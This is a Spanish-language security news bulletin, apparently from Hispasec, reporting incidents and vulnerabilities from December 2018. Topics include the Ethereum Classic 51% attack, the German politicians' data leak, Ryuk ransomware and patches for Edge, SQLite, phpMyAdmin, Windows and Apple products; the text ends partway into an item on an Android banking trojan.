OKEx, casa de cambio china, aseguran que sus clientes no se ven afectados y mantienen el depósito y retirada de ETC habilitado. Para el depósito de ETC será necesario un mínimo de 100 confirmaciones, ypara la retirada serán necesarias 400. Además continúan monitorizando la situación por si hubiera que tomar otro tipo de medidas.

Binance y Bitfly también han aumentado el número de confirmaciones.

Gate.io confirmó que el doble gasto afectó a sus fondos, la plataforma detectó 7 transacciones relativas al ataque. El atacante transfirió un total de 54.200 ETC a través de 4 direcciones. La casa de cambio bloqueó el ataque al poco de producirse pero generó una pérdida total de 40.000 ETC para la plataforma, unos 199.600 dólares.

El ataque de 51% a Ethereum Classic sigue en desarrollo y sus representantes no han brindado mayores detalles desde el pasado lunes. Por esta razón, es posible que otras casas de cambio tomen medidas o reporten pérdidas de fondos en ETC.

Más información
Definición de blockchain
Blog coinbase

Fuentes
https://www.criptonoticias.com/seguridad/casas-cambio-toman-medidas-ataque-51-porciento-ethereum-classic/
https://bitcoin.es/actualidad/los-hackers-de-ethereum-classic-roban-1-5-millones-con-un-ataque-51/
https://criptoinforme.com/los-desarrolladores-de-ethereum-classic-etc-niegan-un-ataque-del-51/

Importante filtración de datos afecta a políticos alemanes, incluyendo a Ángela Merkel

El pasado 28 de diciembre se descubrió que desde las cuentas de twitter @_0rbit y @_0rbiter (actualmente suspendidas) se publicaban enlaces con acceso a información privada de cientos de políticos, periodistas y otras figuras públicas alemanas.

Twitter donde se publicó la filtración de datos.

Se desconoce quién puede estar detrás de este ataque pero se especula que parte de la información ha podido ser extraída de los smartphones de los afectados.

Las filtraciones muestran una gran cantidad de datos sobre políticos y figuras públicas entre los que se encuentran la canciller Angela Merkel o el presidente Frank-Walter Steinmeier. Se incluyen fotos y registros de chat, direcciones privadas, números de teléfono, skype y direcciones de correo, aunque estos son los que menos. Los atacantes comprometieron las cuentas de Outlook, Twitter y Facebook para extraer información.

Algunos archivos se remontan a 2009, y otros datos e imágenes fueron publicadas en Pastebin en 2017. aunque el equipo de Computer Business Review encontró cartas bastante recientes a nivel ministerial enviadas entre compañeros.

Por lo que se aprecia en la forma de filtrar los datos este ataque no ha sido repentino, sino que se ha ejecutado de forma premeditada, preparando decenas de mirrors con los archivos listos para descargar, links intermediarios detallados con la información a descargar con variosmirrors de los mismos archivos por si alguno fallaba.

El objetivo principal han sido todos los partidos políticos alemanes que actualmente están representados en el parlamento, exceptuando el partido de extrema derecha Alternative for German (AfG).

El o los atacantes comenzaron a publicar un enlace con varios links de descarga al día desde el 1 de diciembre de este año. Pero al ver que no tenían repercusión, utilizaron la cuenta de twitter, presuntamente hackeada, del youtuber Simon Unge, que tiene 2 millones de seguidores y publicaron un link al blog donde se podía acceder a los datos robados.

La oficina federal alemana de la seguridad de la información (BSI) está investigando el ataque. Exponen que no se han visto afectadas las redes gubernamentales por el incidente, y que desconocen quién es el o los autores y cuál es el motivo de este ataque.

Más información:

Computer Business Review
https://www.cbronline.com/news/german-data-leak

Revisión de las CVE del 2018

A pocos días de acabar el año 2018 quedan bastante claras las tendencias en las CVE a lo largo del mismo. Por ejemplo, los productos de los que se han reportado más vulnerabilidades han sido Debian, Android y Ubuntu; mientras que las empresas de las que se han reportado más han sido Debian, Google y Oracle; o los tipos de CVE más comunes han sido las ejecuciones de código indeseado, el desbordamiento y los ataques DoS.

Extraído de cerounosoftware.com.mx

La explotacion de vulnerabilidades es una de las estrategias preferidas por los atacantes, siendo las CVE un objetivo clave para muchas familias de malware. Por lo que el incremento de las detecciones de las mismas permite subsanarlas con mayor rapidez para evitar que esas brechas de seguridad sigan disponibles.

El promedio de CVE publicadas en 2018 está en torno a las 46 diarias, casi 6 más que el año pasado. Puede resultar sorprendente que el producto con más CVE reportadas sea precisamente Debian, aunque no hay que olvidar que cuenta con una gran comunidad de respaldo que vigila continuamente cualquier fallo de seguridad para su subsanación. No obstante, los fabricantes con más vulnerabilidades en 2018 fueron Debian (890), Google (712), Oracle (690) y Microsoft (673), mientras que los productos más reportados fueron Debian Linux (889), Android (549) y Ubuntu Linux (451). Por otro lado, los tipos de CVE que más se reportaron en 2018 fueron la ejecución de código no deseado (22%), los ataques por desbordamiento (18%) y los ataques DoS (11%); mientras que los menos reportados fueron por su parte la división de respuesta HTTP (0,1%), la inserción de archivos (0,2%) y la elevación de privilegios (2,5%).

Respecto a la gravedad de las CVE reportadas, el promedio del año no ha alcanzado el nivel 6, siendo menos del 10% superior al nivel 8 y poco más del 41% inferior al nivel 5.

Luciano Miguel Tobaria

lmiguel@hispasec.com

Más información:

Ejecución de código remoto en Cscape de Horner Automation

Cscape es un software libre destinado a la programación de controladores lógicos programables o PLC (Programmable Logic Controller) desarrollado por la empresa Horner Automation. Los PLCs son muy utilizados en la industria para automatizar procesos electromecánicos tales como controlar la lógica de funcionamiento de máquinas, plantas y procesos industriales.

Se ha publicado una vulnerabilidad que podría permitir la ejecución remota de código arbitrario en el software de programación Cscape. El error de seguridad se debe a una falta de comprobación de las entradas suministradas por el usuario que podría provocar una escritura fuera de los limites del ‘buffer’ asignado al procesar un fichero CSP especialmente manipulado. Para lograr explotar la vulnerabilidad con éxito es necesaria la interacción del usuario, que podría ser engañado para visitar una página o abrir un archivo malicioso.

La vulnerabilidad, a la que se ha asignado el identificador CVE-2018-19005, fue descubierta por los investigadores de seguridad ‘rgod’ y ‘mdm’ del equipo ‘9SG Security Team’ de ‘Trend Micro’s Zero Day Initiative’ el pasado mes de Julio pero no ha sido hecha pública hasta el inicio del nuevo año para permitir a la empresa desarrolladora solventar el fallo.

Más Información:

Horner Automation Cscape CSP File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability:
https://www.zerodayinitiative.com/advisories/ZDI-19-1434/

Ransomware paraliza la producción de los principales periódicos de EEUU

El pasado fin de semana, Tribune Publishing Co, empresa que produce los principales periódicos de Estados Unidos, fue víctima de una infección por ransomware de la familia Ryuk que paralizó la impresión y las entregas de varios periódicos importantes del país. Entre los periódicos afectados se encuentran Los Angeles Times y Wall Street Journal.

El malware Ryuk comparte bastante similitud con la familia de ransomware Hermes. Está asociado al Grupo Lazarus y se suele distribuir mediante ataques APT, a diferencia de la gran mayoría de este tipo de ataques que basan su propagación en spam o explotación masiva de vulnerabilidades.

Este malware crea dos notas de rescate, según información publicada por la empresa Checkpoint y pide como rescate entre 15 y 50 BTC.

Ryuk asocia a cada infección un ‘wallet’ único, lo que hace altamente complicado seguir el flujo del dinero y estimar el volumen de infecciones. Como es normal en estos casos, una vez el dinero es obtenido se mueve entre varias cuentas para dificultar el seguimiento del mismo.

Desde Hispasec trabajamos con empresas de todo el mundo para tratar de mitigar su exposición a este tipo de amenazas.  Dotamos a nuestros clientes de elevados niveles de protección a través de planes de seguridad. Estos planes cubren la infraestructura interna y externa, procesos formativos y de concienciación a empleados y proporcionan servicios globales de consultoría y auditoría de sistemas, así como simulación de ataques de ransomware.

Si desea recibir información sobre nuestros planes de seguridad contacte con el departamento comercial al email comercial@hispasec.com o al teléfono +34 952 020 494.

Gestor de contraseñas online, expone información de sus usuarios y avisa casi un año después

blur

La filtración en este gestor de contraseñas online incluye correos electrónicos, nombres y apellidos, direcciones IP, hashes de contraseña y recordatorios de contraseña

El día 13 de diciembre del pasado año, el equipo de seguridad de Abine descubrió que información sensible de sus usuarios podría haberse visto expuesta hasta el día 6 de enero del mismo año. Los datos incluidos son:

  • Todas las direcciones de email de las cuentas de usuario.
  • Nombres y apellidos de algunos de los usuarios.
  • Recordatorios de contraseña, aunque sólo de aquellos que siguiesen usando este servicio a través de un antiguo producto de la compañía.
  • Última y penúltima dirección IP con la que accedieron todos sus usuarios.
  • Hashes de contraseña de la cuenta de Blur utilizando Bcrypt de forma segura.

La filtración no afecta a los datos almacenados en la cartera de contraseñas, así como a la información de pago por el servicio. Tampoco se han visto afectados los usuarios que hayan creado su cuenta tras el día 6 de enero del 2018, fecha de la que data la filtración. No obstante, al haberse revelado los hashes de contraseña, desde la empresa ya han recomendado a sus usuarios cambiar su clave de acceso.

Aunque en el comunicado no se ha descrito en qué ha consistido la filtración, ni quién ha podido tener acceso a la misma, sorprende la diferencia de tiempo entre que se realizó (6 de enero) y se descubrió (13 de diciembre). Al no haber información adicional, sólo cabe elucubrar sobre si la filtración fue debida a un descuido de un empleado, un trabajador descontento, o si se debe a una vulnerabilidad ya resuelta o aún disponible.

Fuente:

Blur Security Update:
https://www.abine.com/blog/2018/blur-security-update/

 

Noticias de Seguridad Diciembre 2018

Las 25 peores contraseñas del 2018

En el ranking de las peores contraseñas del 2018, podemos ver que ‘123456’ y ‘password’ se mantienen en primer lugar, al igual que en el TOP del año pasado.

passws123456

Cada año SplashData evalúa millones de credenciales a partir de filtraciones de datos y realiza un ranking de las contraseñas más inseguras. Este año entre las 25 primeras podemos encontrar combinaciones nemotécnicas de teclado, como ‘123456’, ‘qwerty’ o ‘zxcvbnm’, nombres propios, como ‘charlie’, e incluso el presidente de los estados unidos ‘donald’ no se libra de aparecer como contraseña.

Listado de las 25 peores contraseñas:
Screen-Shot-2018-12-25-at-8.48.48-PM-3766127526-1545767394429.png

Aquí puedes ver la lista de las 100 peores contraseñas.

Para evitar caer en esta lista y ser vulnerable a ataques de fuerza bruta es importante seguir una serie de directrices para que tus credenciales sean seguras:

  • Crea contraseñas que combinen letras mayúsculas y minúsculas, números y símbolos.
  • Importante que la contraseña no tenga menos de 15 caracteres: cuantos más dígitos tenga la contraseña, más difícil es romperla por fuerza bruta si se consigue su hash.
  • No reutilizar la misma contraseña en diferentes servicios. Si es necesario, utilizar un gestor de contraseñas como KeePass, Bitwarden, etc. Con ellos puedes generar contraseñas seguras.
  • No utilizar patrones de teclado, por ejemplo ‘qwertyuiop’ o ‘1qaz2wsx3edc’
  • No apuntar la contraseña en notas y pegarlas al escritorio u ordenador, aunque parezca obvio, es algo muy común.
  • Por último una buena acción es comprobar que la contraseña no está en diccionarios de passwords públicos.

Más información: 

TeamsID
https://www.teamsid.com/100-worst-passwords-top-50/

Ejecución remota de código a través de Microsoft Edge

El pasado 11 de diciembre, Microsoft hacía pública una vulnerabilidad en Microsoft Edge que permitía a un atacante ejecutar código arbitrario de forma remota.

La vulnerabilidad, etiquetada con CVE-2018-8629, se encuentra en el componente “Chakra”, el interprete de JScript utilizado por el navegador. Y se debe a un fallo a la hora de gestionar los objetos en memoria que podría ser aprovechado por un atacante para corromper dicha memoria y ejecutar código arbitrario en el contexto y con los permisos del usuario actual. Pudiendo así instalar programas, ver, modificar o eliminar información o crear nuevas cuentas de usuario.

En un posible escenario, el atacante podría utilizar una web especialmente diseñada o vulnerada para explotar el fallo en el sistema de la víctima que visite la página.

El equipo de investigadores de @phoenhex ha publicado una prueba de concepto que, en a penas 70 líneas, permite leer información de la memoria.

Se recomienda instalar cuanto antes el parche publicado por Microsoft para solucionar esta vulnerabilidad.

Más información

OOB read leak by bkth from phoenhex for ChakraCore https://github.com/phoenhex/files/blob/master/pocs/cve-2018-8629-chakra.js

Un nuevo ransomware infecta servidores Linux a través de IPMI

Se ha detectado un nuevo malware de tipo ransomware utilizado para infectar servidores Linux a través IPMI

junglesec-ransom-note

Este nuevo ransomware, que recibe el nombre de ‘JungleSec‘, fue detectado en Noviembre y esta diseñado para infectar servidores Linux con IPMI (Intelligent Platform Management Interface) no securizado.

IPMI es un conjunto de especificaciones de interfaces que proporcionan capacidades de administración y monitorización en un ordenador independientemente de la CPU, firmware y sistema operativo. Esta incluido en las placa base de los servidores, aunque también puede instalarse como una tarjeta adicional si no la incluye la placa base.

Una interfaz IPMI no configurada, puede dar acceso remoto al sistema a los atacantes, lo que les daría control total sobre el servidor.

Investigadores de BleepingComputer que detectaron este malware, afirman que descubrieron que los atacantes habían usado una interfaz IPMI para acceder a los servidores y posteriormente instalar el malware. En algunos casos, la interfaz IPMI estaba configurada con la contraseña por defecto. En otros casos, las víctimas afirman que el usuario ‘Admin’ de la interfaz estaba desactivado, por lo que se sospecha que los atacantes pudiesen acceder usando alguna vulnerabilidad en el sistema IPMI.

Los atacantes, una vez accedían al sistema a través de la interfaz IPMI, descargaban y compilaban ccrypt, que finalmente usaban para cifrar todos los ficheros del servidor. Una vez cifrados los archivos, los atacantes dejaban un fichero llamado ‘ENCRYPTED.md’ con las instrucciones para realizar el pago del rescate.

IoCs
Nombres de Ficheros:
ENCRYPTED.md
key.txt

Direcciones de correo electrónico:
junglesec@anonymousspeech.com

Más información:

Cibercriminales chinos atacan las redes de HP e IBM y luego atacan a sus clientes

Cibercriminales que trabajan presuntamente para el Ministerio de Seguridad del Estado de China han perpetrado un ataque contra HP e IBM y posteriormente atacaron a sus clientes con el objetivo de robar información sensible.

Como ya sabemos, en la época en la que vivimos, la información es poder, y no dejaremos de leer noticias como ésta en la que dos gigantes se enfrentan para obtener información que deje entrever los trapos sucios de unas u otras empresas.

Tal es así que Estados Unidos, a través de su secretario de estado Mike Pompeo y la responsable de Seguridad Nacional Kirstjen Nielsen, afirman estar recibiendo una amplia campaña de ciberataques por parte de China contra su propiedad intelectual y con motivo de la obtención de datos comerciales. Estados Unidos afirma que la campaña china no solo afecta a sus infraestructuras sino que Europa y Asia también pueden verse involucrados.

IBM declara que no tiene pruebas de que sus datos confidenciales se hayan visto comprometidos, mientras que HP declara que no puede hacer comentarios al respecto.

China niega todo lo relacionado con los ciberataques pero vuelven a tensarse las comunicaciones con EEUU. Ha calificado las denuncias como difamatorias y ha presentado una nueva queja formal contra Estados Unidos, que se suma a la presentada hace apenas dos semanas por el denominado caso Huawei.

Dos ciudadanos chinos, Zhu Hua y Zhang Jianguo, supuestamente vinculados a una agencia de espionaje, han sido acusados de robar datos confidenciales de agencias gubernamentales del país y de empresas de todo el mundo. Empresas como la NASA, la Marina o el Departamento de Energía pudieron ser el objetivo de estos cibercriminales.

Estos piratas informáticos han sido acusados de conspirar para cometer intrusiones en empresas de Estados Unidos y de todo el mundo y los relacionarían con la agencia de inteligencia del Ministerio de Seguridad del Estado de China.

“Ningún país representa una amenaza más amplia y severa a largo plazo para la economía y la infraestructura informática de nuestro país que China” Afirmó el director del FBI, Chris Wray, en una rueda de prensa.

Según el responsable de la oficina federal de investigación la intención de China es ocupar el lugar de estados unidos como “Potencia líder en el mundo”

¿Qué opináis vosotros?

Fuentes:

https://thehackernews.com/2018/12/chinese-hacker-wanted-by-fbi.html

Amazon envía por error 1.700 grabaciones de Alexa de otro cliente

amazon-echo-2016-promo-pic-2

Las conversaciones permitieron encontrar fácilmente a la persona afectada y a su pareja, además de conocer sus hábitos y horarios

El Reglamento General de Protección de Datos (GDPR) de la Unión Europea permite solicitar a un consumidor los datos que tiene una empresa sobre él. Un usuario alemán de Amazon, amparándose en dicha ley, recibió en un zip de 100MiB unos 50 archivos con sus búsquedas e información privada, además de 1.700 ficheros de audio junto con transcripciones, a pesar de que nunca había usado Alexa.

El usuario intentó hablar con Amazon, pero al no recibir respuesta contactó con la revista c’t Magazine para buscar a la persona que aparecía en las grabaciones que recibió. A pesar de que durante este tiempo Amazon borró el enlace para descargar el zip (tal vez al darse cuenta del error), ya se había realizado una copia de seguridad, lo que permitió continuar la investigación.

Gracias a la grabaciones, la revista pudo obtener un perfil de la persona que aparecía un ellas. No fue complicado, ya que aparecía nombres de transportes públicos que utilizaba, personas con las que hablaba, sus nombres, sus trabajos, gustos musicales… También se escuchaba en las grabaciones a la víctima hablar con su novia, a la que se llega a oír cómo se ducha en uno de los audios.

Tras conocer a la víctima y hablar con ella a través de Twitter, el medio contactó también con Amazon para exponer los hechos, pero sin revelar que habían descubierto a la persona afectada. Finalmente, la empresa respondió a los 3 días, asegurando que había llamado a las personas involucradas para explicarles que todo había sido debido a un error humano, y que iban a tomar medidas para que algo así no volviese a suceder.

Amazon se negó a responder preguntas a la prensa, pero aseguró que fueron conscientes del fallo por sí mismos. Esto plantea un posible problema legal en Europa para Amazon, ya que la nueva ley (GDPR) obliga a las empresas a notificar este tipo de incidencias a las 72 horas de descubrirse. Si lo sucedido se hubiese ocultado, podría estar obliga a pagar hasta 20 millones (o el 4% de su facturación) por haber incumplido la ley.

Fuente:

Alexa, Who Has Access to My Data?
https://www.heise.de/downloads/18/2/5/6/5/3/9/6/ct.0119.016-018_engl.pdf

Nuevo malware: recibe comandos de memes de Twitter

La empresa Trend Micro ha sido la descubridora de este novedoso tipo de ataque que recoge los comandos de una cuenta de Twitter controlada por los atacantes.

Ejemplo de cuenta utilizada para mandar instrucciones al malware

¿Cuál es el malware en cuestión?

El malware utilizado es denominado “TROJAN.MSIL.BERBOMHTHUM.AA“. Su forma de trabajo es infectar un equipo, y tras ello descargar las imágenes que contienen las instrucciones a seguir.

¿Que información sacan de las imágenes?

Los memes publicados en la cuenta hacían uso de técnicas de Esteganografía para ocultar los comandos que ejecutaba el malware. Estos, tras ejecutar las instrucciones, accedían a una publicación de Pastebin para conseguir la dirección del servidor al que enviaban la información robada.

Según los investigadores, la cuenta de Twitter analizada se creó en 2017 y contenía solo dos memes que entregaban comandos “/ print” al malware para indicarle que realizara capturas de pantalla.

Este malware mandaba las capturas al servidor C&C sacado de la URL de Pastebin facilitada en la imagen.

¿Desde cuando se realiza este tipo de ataque?

Según VirusTotal, el malware surgió a mediados de octubre, pues fue cuando se creó la publicación en Pastebin.

Sin embargo, en los memes analizados, la dirección del servidor es local, lo que hace pensar que los ciberdelincuentes aún se encontraban realizando pruebas con el mismo antes del ataque.

Tras el reporte realizado por TrendMicro, Twitter tomó cartas en el asunto y cerró la cuenta involucrada.

Más información:

Post de TrendMicro:
https://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-use-malicious-memes-that-communicate-with-malware/

Revelación de información a través de Twitter

Un fallo en uno de los formularios de soporte de Twitter ha podido ser utilizado por atacantes financiados por el estado para revelar información sensible.

El pasado 15 de noviembre fue descubierto un ‘bug’ en uno de los formularios de Twitter utilizado para reportar incidencias que permitía revelar el código del país del número de teléfono asociado a una cuenta de Twitter o el estado (bloqueada o no) de dicha cuenta.

Tras investigar el fallo de seguridad, la compañía descubrió cierta actividad inusual relacionada con la API asociada a dicho formulario: un gran volumen de peticiones desde direcciones IP de China y Arabia Saudi que, según la compañía, pueden estar relacionadas con actores financiados por estos estados; como ha declarado Twitter en su anuncio oficial.

La vulnerabilidad fue resuelta el 16 de noviembre y aunque no era posible revelar el número de teléfono completo ni ninguna otra información personal, Twitter ha advertido a las cuentas afectadas.

Uso de técnicas de hacking con fines propagandísticos para un famoso youtuber: PewDiePie

PewDiePie es un youtuber sueco, quizás el youtuber más popular de internet. Actualmente su cuenta es la más seguida, junto con T-Series, una compañía musical india, de la que hablaremos en unas líneas.

Lo acontecido es cuando menos, premonitorio o claramente descriptivo de la sociedad en la que vivimos hoy en día, lo que puede ser considerado algo gracioso o anecdótico para algunos, nos alarma y preocupa profundamente a otros.

El popular Youtuber PewDiePie vio recientemente su trono amenazado al ver como la cuenta T-Series llegaba a igualarle en millones de suscriptores. Este caso fue usado por PewDiePie para crear contenido alrededor de este hecho y hacer un llamamiento a sus fans para no caer del primer puesto. En este vídeo de su canal podemos hacer un seguimiento en directo de ambas cuentas.

Pues bien, al menos dos de sus seguidores llevaron a cabo un ataque en cerca de 2 millones de impresoras de las cuales al menos en 100.000 de ellas lograron imprimir panfletos haciendo un llamamiento para buscar suscriptores de la cuenta de PewDiePie.

https://twitter.com/Thrillka/status/1074016514804715520/photo/1

Estas impresoras estaban abiertas a internet a través de los protocolos IPP, JetDirect y LPD, por lo que perfectamente podrían haber sido encontradas a través de la herramienta Shodan.

Al margen de lo ‘script kiddies’ del asunto, lo delirante del tema y sobre lo que debemos de poner el foco es sobre cómo un fanatismo, si bien es cierto que sustentado por un tono jocoso, ha llevado a estas dos personas a cometer un delito para, como se suele decir, llenarse de ‘loles’ y acrecentar su imagen virtual.

Fallo crítico en SQLite podría afectar a miles de apps

El grupo Blade de Tencent ha descubierto un fallo de seguridad en SQLite, que permite realizar RCE, o provocar rupturas inesperadas del programa que utiliza este servicio.

magellan

SQLite es un gestor de base de datos relacional y multiplataforma que encontramos embebido en multitud de aplicaciones y sistemas. Lo que diferencia a SQLite de otros SGBD es que no es un proceso independiente con el que el programa principal se comunica, sino que se lanza con el programa pasando a ser parte integral del mismo. Por eso esta vulnerabilidad estará presente durante largo tiempo en diferentes sistemas y aplicaciones, ya que es necesario actualizar la librería utilizada dentro de la aplicación.

Los investigadores de Tencent han descubierto la posibilidad de encontrar fugas de información del programa que se está ejecutando, detener su ejecución o incluso conseguirejecutar comandos de forma remota simplemente accediendo a una página web malintencionada, si se da el caso en el que el navegador soporte SQLite junto con la ya obsoleta API WebSQL, que es capaz de traducir el código del exploit a sintaxis SQL. Firefox y Edge no dan soporte a WebSQL, pero otros navegadores basados en el proyecto open-source de Chromium como motor del navegador sí, como es el caso de Google Chrome, Opera, Vivaldi, etc.

Pero, aún siendo los navegadores el principal objetivo de ataque, El equipo Blade afirmó en este comunicado que “ha sido posible explotar ‘Google Home’ con esta vulnerabilidad y actualmente no tienen pensado revelar el código utilizado para explotarla”. Mostrando así que el fallo no solo afecta a algunos navegadores, sino que todos los sistemas que utilicen SQLite que no estén actualizados y cumplan las características necesarias son vulnerables.

El fallo fue reportado al equipo de SQLite y actualizado en la versión SQLite 3.26.0 al igual que se reportó a Chromium y se ha limitado el uso de WebSQL en la nueva versión 71.

En esta prueba de concepto se bloquea el proceso del rendizador utilizando ‘Magellan’.

poc-sqlite

Claro que para que cause efecto es necesario utilizar el navegador adecuado, por ejemplo Google Chrome en una versión menor que la 71. En el código podemos ver que se utiliza el motor de búsqueda de texto completo (full-text) FTS3, y que se están alterando los datos de las ‘shadow tables’ manualmente.  Por otra parte, la nueva actualización de SQLite da la opción de utilizar estas mismas tablas con permiso ‘read-only’, lo que nos hace pensar en que el fallo nace en los permisos de acceso a las ‘shadow tables’.

Fuentes

zdnet
https://www.zdnet.com/article/sqlite-bug-impacts-thousands-of-apps-including-all-chromium-based-browsers/#ftag=RSSbaffb68

Tencent
https://blade.tencent.com/magellan/index_en.html

Github
https://github.com/zhuowei/worthdoingbadly.com/blob/master/_posts/2018-12-14-sqlitebug.html

SQLite Doc
https://www.sqlite.org/fts3.html#*shadowtab

Microsoft parchea una vulnerabilidad 0-day explotada activamente

Microsoft ha liberado el habitual paquete mensual acumulativo de parches de su sistema operativo Windows para el mes de diciembre.

En esta ocasión se han parcheado un total de 39 vulnerabilidades, 10 de las cuales tienen criticidad alta y otras tantas son valoradas como importantes.

Según Kaspersky, una de las vulnerabilidades era un 0-day que está siendo activamente explotado por varios grupos maliciosos (o APTs) tales como FruityArmor o SandCat.

El fallo en cuestión que está siendo aprovechado permite elevar privilegios a debido a un fallo en el kernel de Windows (ntoskml.exe) y ejecutar código arbitrario. A este fallo se le ha dado el identificador CVE-2018-8611 y consiste en una mala gestión en el procesado de ciertas operaciones en modo kernel. Lo que permite evitar las (modernas) políticas configuradas para los procesos.

Este fallo afecta a todas las versiones de Windows; desde Windows 7 hasta Windows Server 2019.

Otra vulnerabilidad con el identificador CVE-2018-8517 es una denegación de servicio remota presente en aplicaciones web desarrolladas con el framework .NET cuya causa es un manejo incorrecto de solicitudes web malformadas.

De esta última vulnerabilidad no se tienen evidencias de que haya sido explotada a gran escala.

El resto de parches cubren parches para distintos productos de la familia de Microsoft, tales como Edge, Internet Explorer, Office, etc.

Como siempre, se recomienda aplicar los parches de seguridad tan pronto como sea posible.

Más información:

https://thehackernews.com/2018/12/microsoft-patch-updates.html

https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/6c54acc6-2ed2-e811-a980-000d3a33a34d

 

Google + descubre un nuevo fallo de seguridad y acelera su cierre

Google, a través de un comunicado, ha acelerado el cierre de su plataforma Google + a 90 días hábiles desde el 10 de diciembre, en lugar del mes de abril de 2019, fecha prevista para el cierre definitivo de la fallida red social de Google.

Google

Este comunicado ha sido propiciado por un nuevo fallo de seguridad encontrado por los propios procesos de seguridad del gigante tecnológico. El fallo fue introducido en una actualización de noviembre.

El fallo permitía a una aplicación de terceros solicitar información confidencial de un usuario aún cuando este no lo había autorizado, este fallo habría afectado a 52.5 millones de usuarios. La vulnerabilidad, concretamente estaba en la API “People: get” y potencialmente permitía la sustracción de la información personal de todos los usuarios de la red social, incluyendo nombres, direcciones de correo, ocupación laboral, edad, etc.

Cabe recordar que en el mes de octubre, ya nos hicimos eco desde en este mismo boletín, de la vulnerabilidad sufrida que precipitaba el cierre de la misma para el mes de abril.

 

Más información:

Notificación de Google: https://www.blog.google/technology/safety-security/expediting-changes-google-plus/

Unaaldía: https://unaaldia.hispasec.com/2018/10/google-expone-los-datos-de-500-000-usuarios-y-cierra-su-plataforma.html

Actualización crítica de phpMyAdmin

Resultado de imagen de phpmyadmin

El proyecto phpMyAdmin, uno de los sistemas de administración de bases de datos MySQL más populares, dio un aviso el pasado domingo en su blog avisando sobre la última actualización de seguridad, algo que no habían hecho antes.

“Nos inspiramos en el flujo de trabajo de otros proyectos que a menudo anuncian con anticipación cualquier lanzamiento de seguridad para permitir que los encargados de paquetes y proveedores de alojamiento se preparen. Estamos experimentando si dicho flujo de trabajo es adecuado para nuestro proyecto”, explicaba el gerente de lanzamiento de phpMyAdmin, Isaac Bennetch.

Además de la típica corrección de errores, esta versión corrige tres vulnerabilidades críticas de seguridad.

Vulnerabilidades corregidas en la versión 4.8.4:

  1. LFI (CVE-2018-19968):
    Las versiones de phpMyAdmin de entre 4.0 y 4.8.3 incluyen un error de inclusión de archivos locales que podría permitir la lectura de archivos locales del servidor a un atacante remoto.Para explotar esta vulnerabilidad, el atacante debe tener acceso a las tablas de almacenamiento de configuración de phpMyAdmin, aunque puede crearse fácilmente en cualquier base de datos a la que tenga acceso el atacante.
  2. CSRF/XSRF (CVE-2018-19969):
    Las versiones de 4.7.0 a 4.7.6 y de 4.8.0 a 4.8.3 incluyen un defecto deCross-site Request Forgery que de ser explotado, permitiría a los atacantes realizar operaciones SQL malintencionadas.Para explotar esto únicamente deberían de convencer a las víctimas de que abran enlaces especialmente diseñados.
  3. XSS (CVE-2018-19970):
    Hay un fallo de Cross-site Scripting entre las versiones 4.0 y 4.8.3 con el que un atacante puede inyectar código a través de un nombre de tabla/base de datos especialmente diseñado.

Se recomienda a todos los usuarios de este software que actualicen a la última versión cuanto antes.

Mas información:

Descarga de la versión 4.8.4:
https://www.phpmyadmin.net/files/4.8.4/

Comunicado de pre-lanzamiento:
https://www.phpmyadmin.net/news/2018/12/9/upcoming-security-release-pre-announcement/

Actualizaciones para múltiples productos Apple

Apple ha publicado 8 boletines de seguridad que solucionan vulnerabilidades en los productos iOS, macOS, watchOS, tvOS, Safari, iTunes e iCloud para Windows y Shortcuts para iOS. Entre todos los productos se corrigen 26 fallos de seguridad.

Los boletines publicados con las actualizaciones y problemas solucionados se resumen a continuación.

El boletín para el sistema operativo para dispositivos móviles de Apple (iPad, iPhone, iPod, etc.), iOS 12.1.1, resuelve 20 vulnerabilidades relacionadas con múltiples componentes, entre los que se incluyen ‘Airport’, ‘Disk Images’, ‘FaceTime’, el kernel y ‘WebKit’ entre otros. Cuatro de los fallos permitirían la ejecución de código arbitrario a través de una web especialmente manipulada (CVE-2018-4441, CVE-2018-4442, CVE-2018-4443 y CVE-2018-4438). Estas vulnerabilidades también están presentes en Safari, watchOS y tvOs. Otras dos vulnerabilidades en el kernel permitirían la ejecución de código arbitrario con privilegios de sistema (CVE-2018-4447 y CVE-2018-4461).

macOS Mojave 10.14.2 y los Security Update 2018-003 para High Sierra y 2018-006 para Sierra. En este caso se solucionan 13 vulnerabilidades que afectan a múltiples componentes, que entre otros incluyen a ‘Carbon Core’, ‘Disk Images’, ‘IOHIDFamily’, el kernel y ‘WindowServer’. Siete de estas vulnerabilidades podrían permitir la ejecución de código arbitrario con privilegios de kernel (CVE-2018-4463, CVE-2018-4465, CVE-2018-4427, CVE-2018-4447, CVE-2018-4461, CVE-2018-4449 y CVE-2018-4450).

Safari 12.0.2 cuenta con otro boletín que soluciona 9 vulnerabilidades debidas, en su mayoría, a problemas en ‘WebKit’, el motor de código abierto que es la base de este navegador. También varios de los errores corregidos permitirían que una web maliciosa suplantase la URL mostrada al usuario para hacerle creer que se encuentran en un sitio web legítimo (CVE-2018-4440 y CVE-2018-4439).

El boletín para el sistema operativo de los relojes inteligentes de Apple, watchOS 5.1.2, soluciona 15 vulnerabilidades entre las que también se encuentran algunas que podrían permitir la ejecución de código arbitrario (CVE-2018-4438, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443, CVE-2018-4437, CVE-2018-4464, CVE-2018-4461, CVE-2018-4447, CVE-2018-4427).

tvOS, el sistema operativo de los televisores de la marca, se actualiza a la versión 12.1.1, donde se corrigen 14 vulnerabilidades en múltiples componentes. Dos de ellas permitirían elevar privilegios en el sistema (CVE-2018-4435 y CVE-2018-4303) y/o la ejecución de código arbitrario (CVE-2018-4438, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443, CVE-2018-4437, CVE-2018-4464).

Las versiones iTunes 12.9.2 e iCould 7.9 para Windows corrigen 8 vulnerabilidades cada una, algunas también de gravedad alta.
Todas estas versiones que corrigen los problemas de seguridad publicados en los boletines se encuentran disponibles en la página oficial de Apple, así como a través de los canales habituales de actualización.

Más información:

Apple security updates
https://support.apple.com/en-us/HT201222

Nueva versión del troyano bancario ‘Marcher’ para Android

Una nueva versión del troyano bancario ‘Marcher’ ha sido detectada recientemente en Koodous, nuestro antivirus colaborativo

android

